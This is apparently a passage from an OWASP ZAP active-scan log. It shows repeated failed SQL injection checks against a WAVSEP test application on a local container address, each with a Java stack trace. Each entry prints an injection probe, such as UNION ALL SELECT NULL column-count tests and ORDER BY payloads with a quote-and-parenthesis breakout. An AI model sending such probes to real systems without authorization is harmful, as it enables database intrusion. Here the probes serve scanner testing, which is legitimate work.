org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922572 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922574 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922576 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922578 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') ORDER BY 3297-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') ORDER BY 3297-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922580 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922581 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922583 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922584 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922585 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922585 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922589 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922591 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922593 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at 